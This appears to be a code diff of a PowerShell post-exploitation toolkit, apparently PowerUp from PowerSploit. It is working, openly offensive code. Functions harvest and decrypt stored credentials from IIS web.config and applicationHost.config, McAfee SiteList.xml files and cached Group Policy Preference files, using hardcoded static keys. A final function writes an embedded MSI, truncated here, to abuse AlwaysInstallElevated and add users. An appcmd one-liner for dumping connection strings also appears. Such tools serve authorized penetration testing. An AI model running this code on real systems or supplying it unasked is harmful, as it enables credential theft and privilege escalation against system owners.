192.168.1.103\server3 D:\App3 D:\App3\web.config No +.LINK - .LINK +https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx - https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 - http://www.netspi.com - https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx - http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe - http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx +.NOTES - .NOTES +Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. +for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings - Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. - for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings +Author: Scott Sutherland - 2014, NetSPI +Author: Antti Rantasaari - 2014, NetSPI #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')] + [OutputType('System.Boolean')] + [OutputType('System.Data.DataTable')] [CmdletBinding()] Param() $OrigError = $ErrorActionPreference - $ErrorActionPreference = "SilentlyContinue" + $ErrorActionPreference = 'SilentlyContinue' # Check if appcmd.exe exists if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) { @@ -3054,15 +3843,15 @@ function Get-WebConfig { $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table - $Null = $DataTable.Columns.Add("user") - $Null = $DataTable.Columns.Add("pass") - $Null = $DataTable.Columns.Add("dbserv") - $Null = $DataTable.Columns.Add("vdir") - $Null = $DataTable.Columns.Add("path") - $Null = $DataTable.Columns.Add("encr") + $Null = $DataTable.Columns.Add('user') + $Null = $DataTable.Columns.Add('pass') + $Null = $DataTable.Columns.Add('dbserv') + $Null = $DataTable.Columns.Add('vdir') + $Null = $DataTable.Columns.Add('path') + $Null = $DataTable.Columns.Add('encr') # Get list of virtual directories in IIS - C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath | + C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath | ForEach-Object { $CurrentVdir = $_ @@ -3071,7 +3860,7 @@ function Get-WebConfig { if ($_ -like "*%*") { $EnvarName = "`$Env:"+$_.split("%")[1] $EnvarValue = Invoke-Expression $EnvarName - $RestofPath = $_.split("%")[2] + $RestofPath = $_.split('%')[2] $CurrentVdir = $EnvarValue+$RestofPath } @@ -3088,18 +3877,17 @@ function Get-WebConfig { if ($ConfigFile.configuration.connectionStrings.add) { # Foreach connection string add to data table - $ConfigFile.configuration.connectionStrings.add| + $ConfigFile.configuration.connectionStrings.add| ForEach-Object { [String]$MyConString = $_.connectionString - if($MyConString -like "*password*") { - $ConfUser = $MyConString.Split("=")[3].Split(";")[0] - $ConfPass = $MyConString.Split("=")[4].Split(";")[0] - $ConfServ = $MyConString.Split("=")[1].Split(";")[0] + if ($MyConString -like '*password*') { + $ConfUser = $MyConString.Split('=')[3].Split(';')[0] + $ConfPass = $MyConString.Split('=')[4].Split(';')[0] + $ConfServ = $MyConString.Split('=')[1].Split(';')[0] $ConfVdir = $CurrentVdir - $ConfPath = $CurrentPath - $ConfEnc = "No" - $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc) + $ConfEnc = 'No' + $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc) } } } @@ -3112,7 +3900,7 @@ function Get-WebConfig { if (Test-Path ($AspnetRegiisPath.FullName)) { # Setup path for temp web.config to the current user's temp dir - $WebConfigPath = (Get-Item $Env:temp).FullName + "\web.config" + $WebConfigPath = (Get-Item $Env:temp).FullName + '\web.config' # Remove existing temp web.config if (Test-Path ($WebConfigPath)) { @@ -3136,17 +3924,15 @@ function Get-WebConfig { $TMPConfigFile.configuration.connectionStrings.add | ForEach-Object { [String]$MyConString = $_.connectionString - if($MyConString -like "*password*") { - $ConfUser = $MyConString.Split("=")[3].Split(";")[0] - $ConfPass = $MyConString.Split("=")[4].Split(";")[0] - $ConfServ = $MyConString.Split("=")[1].Split(";")[0] + if ($MyConString -like '*password*') { + $ConfUser = $MyConString.Split('=')[3].Split(';')[0] + $ConfPass = $MyConString.Split('=')[4].Split(';')[0] + $ConfServ = $MyConString.Split('=')[1].Split(';')[0] $ConfVdir = $CurrentVdir - $ConfPath = $CurrentPath $ConfEnc = 'Yes' - $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ,$ConfVdir,$CurrentPath, $ConfEnc) + $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc) } } - } else { Write-Verbose "Decryption of $CurrentPath failed." @@ -3162,9 +3948,9 @@ function Get-WebConfig { } # Check if any connection strings were found - if( $DataTable.rows.Count -gt 0 ) { + if ( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline - $DataTable | Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique + $DataTable | Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique } else { Write-Verbose 'No connection strings found.' @@ -3175,79 +3961,96 @@ function Get-WebConfig { Write-Verbose 'Appcmd.exe does not exist in the default location.' $False } - $ErrorActionPreference = $OrigError } function Get-ApplicationHost { - <# - .SYNOPSIS +<# +.SYNOPSIS + +Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. + +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This script will decrypt and recover application pool and virtual directory passwords +from the applicationHost.config file on the system. The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +.EXAMPLE + +Return application pool and virtual directory passwords from the applicationHost.config on the system. + +Get-ApplicationHost + +user : PoolUser1 +pass : PoolParty1! +type : Application Pool +vdir : NA +apppool : ApplicationPool1 +user : PoolUser2 +pass : PoolParty2! +type : Application Pool +vdir : NA +apppool : ApplicationPool2 +user : VdirUser1 +pass : VdirPassword1! +type : Virtual Directory +vdir : site1/vdir1/ +apppool : NA +user : VdirUser2 +pass : VdirPassword2! +type : Virtual Directory +vdir : site2/ +apppool : NA + +.EXAMPLE + +Return a list of cleartext and decrypted connect strings from web.config files. + +Get-ApplicationHost | Format-Table -Autosize + +user pass type vdir apppool +---- ---- ---- ---- ------- +PoolUser1 PoolParty1! Application Pool NA ApplicationPool1 +PoolUser2 PoolParty2! Application Pool NA ApplicationPool2 +VdirUser1 VdirPassword1! Virtual Directory site1/vdir1/ NA +VdirUser2 VdirPassword2! Virtual Directory site2/ NA + +.OUTPUTS - This script will recover encrypted application pool and virtual directory passwords from the applicationHost.config on the system. - - .DESCRIPTION - - This script will decrypt and recover application pool and virtual directory passwords - from the applicationHost.config file on the system. The output supports the - pipeline which can be used to convert all of the results into a pretty table by piping - to format-table. - - .EXAMPLE - - Return application pool and virtual directory passwords from the applicationHost.config on the system. - - PS C:\> Get-ApplicationHost - user : PoolUser1 - pass : PoolParty1! - type : Application Pool - vdir : NA - apppool : ApplicationPool1 - user : PoolUser2 - pass : PoolParty2! - type : Application Pool - vdir : NA - apppool : ApplicationPool2 - user : VdirUser1 - pass : VdirPassword1! - type : Virtual Directory - vdir : site1/vdir1/ - apppool : NA - user : VdirUser2 - pass : VdirPassword2! - type : Virtual Directory - vdir : site2/ - apppool : NA - - .EXAMPLE - - Return a list of cleartext and decrypted connect strings from web.config files. - - PS C:\> Get-ApplicationHost | Format-Table -Autosize - - user pass type vdir apppool - ---- ---- ---- ---- ------- - PoolUser1 PoolParty1! Application Pool NA ApplicationPool1 - PoolUser2 PoolParty2! Application Pool NA ApplicationPool2 - VdirUser1 VdirPassword1! Virtual Directory site1/vdir1/ NA - VdirUser2 VdirPassword2! Virtual Directory site2/ NA - - .LINK - - https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 - http://www.netspi.com - http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe - http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx - - .NOTES - - Author: Scott Sutherland - 2014, NetSPI - Version: Get-ApplicationHost v1.0 - Comments: Should work on IIS 6 and Above +System.Data.DataTable + +System.Boolean + +.LINK + +https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx + +.NOTES + +Author: Scott Sutherland - 2014, NetSPI +Version: Get-ApplicationHost v1.0 +Comments: Should work on IIS 6 and Above #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')] + [OutputType('System.Data.DataTable')] + [OutputType('System.Boolean')] + [CmdletBinding()] + Param() + $OrigError = $ErrorActionPreference - $ErrorActionPreference = "SilentlyContinue" + $ErrorActionPreference = 'SilentlyContinue' # Check if appcmd.exe exists if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) { @@ -3255,11 +4058,11 @@ function Get-ApplicationHost { $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table - $Null = $DataTable.Columns.Add("user") - $Null = $DataTable.Columns.Add("pass") - $Null = $DataTable.Columns.Add("type") - $Null = $DataTable.Columns.Add("vdir") - $Null = $DataTable.Columns.Add("apppool") + $Null = $DataTable.Columns.Add('user') + $Null = $DataTable.Columns.Add('pass') + $Null = $DataTable.Columns.Add('type') + $Null = $DataTable.Columns.Add('vdir') + $Null = $DataTable.Columns.Add('apppool') # Get list of application pools Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object { @@ -3304,7 +4107,7 @@ function Get-ApplicationHost { } # Check if any passwords were found - if( $DataTable.rows.Count -gt 0 ) { + if ( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique } @@ -3318,79 +4121,82 @@ function Get-ApplicationHost { Write-Verbose 'Appcmd.exe does not exist in the default location.' $False } - $ErrorActionPreference = $OrigError } function Get-SiteListPassword { <# - .SYNOPSIS +.SYNOPSIS + +Retrieves the plaintext passwords for found McAfee's SiteList.xml files. +Based on Jerome Nokin (@funoverip)'s Python solution (in links). + +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, +C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate +credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword +function that takes advantage of McAfee's static key encryption. Any decrypted credentials +are output in custom objects. See links for more information. + +.PARAMETER Path + +Optional path to a SiteList.xml file or folder. - Retrieves the plaintext passwords for found McAfee's SiteList.xml files. - Based on Jerome Nokin (@funoverip)'s Python solution (in links). - - PowerSploit Function: Get-SiteListPassword - Original Author: Jerome Nokin (@funoverip) - PowerShell Port: @harmj0y - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - - .DESCRIPTION - - Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, - C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate - credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword - function that takes advantage of McAfee's static key encryption. Any decrypted credentials - are output in custom objects. See links for more information. - - .PARAMETER Path - - Optional path to a SiteList.xml file or folder. - - .EXAMPLE - - PS C:\> Get-SiteListPassword - - EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== - UserName : - Path : Products/CommonUpdater - Name : McAfeeHttp - DecPassword : MyStrongPassword! - Enabled : 1 - DomainName : - Server : update.nai.com:80 - - EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== - UserName : McAfeeService - Path : Repository$ - Name : Paris - DecPassword : MyStrongPassword! - Enabled : 1 - DomainName : companydomain - Server : paris001 - - EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== - UserName : McAfeeService - Path : Repository$ - Name : Tokyo - DecPassword : MyStrongPassword! - Enabled : 1 - DomainName : companydomain - Server : tokyo000 - - .LINK - - https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ - https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ - https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md - https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf +.EXAMPLE + +Get-SiteListPassword + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : +Path : Products/CommonUpdater +Name : McAfeeHttp +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : +Server : update.nai.com:80 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Paris +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : paris001 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Tokyo +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : tokyo000 + +.OUTPUTS + +PowerUp.SiteListPassword + +.LINK + +https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.SiteListPassword')] [CmdletBinding()] - param( - [Parameter(Position=0, ValueFromPipeline=$True)] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] [ValidateScript({Test-Path -Path $_ })] [String[]] $Path @@ -3401,9 +4207,10 @@ function Get-SiteListPassword { # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) # port by @harmj0y + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [CmdletBinding()] - Param ( - [Parameter(Mandatory=$True)] + Param( + [Parameter(Mandatory = $True)] [String] $B64Pass ) @@ -3437,7 +4244,7 @@ function Get-SiteListPassword { # ignore the padding for the result $Index = [Array]::IndexOf($Decrypted, [Byte]0) - if($Index -ne -1) { + if ($Index -ne -1) { $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)]) } else { @@ -3447,10 +4254,11 @@ function Get-SiteListPassword { New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass} } - function Local:Get-SitelistFields { + function Local:Get-SitelistField { + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [CmdletBinding()] - Param ( - [Parameter(Mandatory=$True)] + Param( + [Parameter(Mandatory = $True)] [String] $Path ) @@ -3458,23 +4266,23 @@ function Get-SiteListPassword { try { [Xml]$SiteListXml = Get-Content -Path $Path - if($SiteListXml.InnerXml -Like "*password*") { + if ($SiteListXml.InnerXml -Like "*password*") { Write-Verbose "Potential password in found in $Path" $SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object { try { $PasswordRaw = $_.Password.'#Text' - if($_.Password.Encrypted -eq 1) { + if ($_.Password.Encrypted -eq 1) { # decrypt the base64 password if it's marked as encrypted - $DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''} + $DecPassword = if ($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''} } else { $DecPassword = $PasswordRaw } - $Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server } - $Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath } + $Server = if ($_.ServerIP) { $_.ServerIP } else { $_.Server } + $Path = if ($_.ShareName) { $_.ShareName } else { $_.RelativePath } $ObjectProperties = @{ 'Name' = $_.Name; @@ -3486,7 +4294,9 @@ function Get-SiteListPassword { 'EncPassword' = $PasswordRaw; 'DecPassword' = $DecPassword; } - New-Object -TypeName PSObject -Property $ObjectProperties + $Out = New-Object -TypeName PSObject -Property $ObjectProperties + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.SiteListPassword') + $Out } catch { Write-Verbose "Error parsing node : $_" @@ -3501,7 +4311,7 @@ function Get-SiteListPassword { } PROCESS { - if($PSBoundParameters['Path']) { + if ($PSBoundParameters['Path']) { $XmlFilePaths = $Path } else { @@ -3510,7 +4320,7 @@ function Get-SiteListPassword { $XmlFilePaths | Foreach-Object { Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue } | Where-Object { $_ } | Foreach-Object { Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'" - Get-SitelistFields -Path $_.Fullname + Get-SitelistField -Path $_.Fullname } } } @@ -3518,63 +4328,63 @@ function Get-SiteListPassword { function Get-CachedGPPPassword { <# - .SYNOPSIS +.SYNOPSIS + +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and +left in cached files on the host. - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host. +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None - PowerSploit Function: Get-CachedGPPPassword - Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - - .DESCRIPTION +.DESCRIPTION - Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and datasources.xml files and returns plaintext passwords. +Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and +datasources.xml files and returns plaintext passwords. - .EXAMPLE +.EXAMPLE - PS C:\> Get-CachedGPPPassword +Get-CachedGPPPassword +NewName : [BLANK] +Changed : {2013-04-25 18:36:07} +Passwords : {Super!!!Password} +UserNames : {SuperSecretBackdoor} +File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 + C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr + oups.xml - NewName : [BLANK] - Changed : {2013-04-25 18:36:07} - Passwords : {Super!!!Password} - UserNames : {SuperSecretBackdoor} - File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 - C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr - oups.xml +.LINK - .LINK - - http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html - https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 - https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb - http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences - http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html +http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html #> - + [CmdletBinding()] Param() - + # Some XML issues between versions Set-StrictMode -Version 2 # make sure the appropriate assemblies are loaded Add-Type -Assembly System.Security Add-Type -Assembly System.Core - + # helper that decodes and decrypts password function local:Get-DecryptedCpassword { + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] [CmdletBinding()] - Param ( - [string] $Cpassword + Param( + [string] $Cpassword ) try { - # Append appropriate padding based on string length + # Append appropriate padding based on string length $Mod = ($Cpassword.length % 4) - + switch ($Mod) { '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} '2' {$Cpassword += ('=' * (4 - $Mod))} @@ -3582,34 +4392,36 @@ function Get-CachedGPPPassword { } $Base64Decoded = [Convert]::FromBase64String($Cpassword) - + # Create a new AES .NET Crypto Object $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) - + # Set IV to all nulls to prevent dynamic generation of IV value - $AesIV = New-Object Byte[]($AesObject.IV.Length) + $AesIV = New-Object Byte[]($AesObject.IV.Length) $AesObject.IV = $AesIV $AesObject.Key = $AesKey - $DecryptorObject = $AesObject.CreateDecryptor() + $DecryptorObject = $AesObject.CreateDecryptor() [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length) - + return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) - } - - catch {Write-Error $Error[0]} - } - + } + + catch { + Write-Error $Error[0] + } + } + # helper that parses fields from the found xml preference files - function local:Get-GPPInnerFields { + function local:Get-GPPInnerField { + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [CmdletBinding()] - Param ( - $File + Param( + $File ) - + try { - $Filename = Split-Path $File -Leaf [XML] $Xml = Get-Content ($File) @@ -3618,12 +4430,12 @@ function Get-CachedGPPPassword { $NewName = @() $Changed = @() $Password = @() - + # check for password field if ($Xml.innerxml -like "*cpassword*"){ - + Write-Verbose "Potential password in $File" - + switch ($Filename) { 'Groups.xml' { $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} @@ -3631,78 +4443,78 @@ function Get-CachedGPPPassword { $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value} $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - - 'Services.xml' { + + 'Services.xml' { $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - + 'Scheduledtasks.xml' { $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - - 'DataSources.xml' { + + 'DataSources.xml' { $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - - 'Printers.xml' { + + 'Printers.xml' { $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - - 'Drives.xml' { + + 'Drives.xml' { $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} - $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } } } - - foreach ($Pass in $Cpassword) { + + ForEach ($Pass in $Cpassword) { Write-Verbose "Decrypting $Pass" $DecryptedPassword = Get-DecryptedCpassword $Pass Write-Verbose "Decrypted a password of $DecryptedPassword" #append any new passwords to array $Password += , $DecryptedPassword } - + # put [BLANK] in variables if (-not $Password) {$Password = '[BLANK]'} if (-not $UserName) {$UserName = '[BLANK]'} if (-not $Changed) {$Changed = '[BLANK]'} if (-not $NewName) {$NewName = '[BLANK]'} - + # Create custom object to output results $ObjectProperties = @{'Passwords' = $Password; 'UserNames' = $UserName; 'Changed' = $Changed; 'NewName' = $NewName; 'File' = $File} - + $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties Write-Verbose "The password is between {} and may be more than one value." - if ($ResultsObject) {Return $ResultsObject} + if ($ResultsObject) { Return $ResultsObject } } catch {Write-Error $Error[0]} } - + try { $AllUsers = $Env:ALLUSERSPROFILE - if($AllUsers -notmatch 'ProgramData') { + if ($AllUsers -notmatch 'ProgramData') { $AllUsers = "$AllUsers\Application Data" } # discover any locally cached GPP .xml files $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue - + if ( -not $XMlFiles ) { Write-Verbose 'No preference files found.' } @@ -3710,32 +4522,56 @@ function Get-CachedGPPPassword { Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." ForEach ($File in $XMLFiles) { - Get-GppInnerFields $File.Fullname + Get-GppInnerField $File.Fullname } } } - catch {Write-Error $Error[0]} + catch { + Write-Error $Error[0] + } } function Write-UserAddMSI { <# - .SYNOPSIS +.SYNOPSIS + +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +.EXAMPLE - Writes out a precompiled MSI installer that prompts for a user/group addition. - This function can be used to abuse Get-RegistryAlwaysInstallElevated. +Write-UserAddMSI - .EXAMPLE +Writes the user add MSI to the local directory. - PS C:\> Write-UserAddMSI +.OUTPUTS - Writes the user add MSI to the local directory. +PowerUp.UserAddMSI #> - $Path = 'UserAdd.msi' + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('ServiceProcess.UserAddMSI')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ServiceName')] + [String] + [ValidateNotNullOrEmpty()] + $Path = 'UserAdd.msi' + ) - $Binary = "0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAEAP7/DAAGAAAAAAAAAAEAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA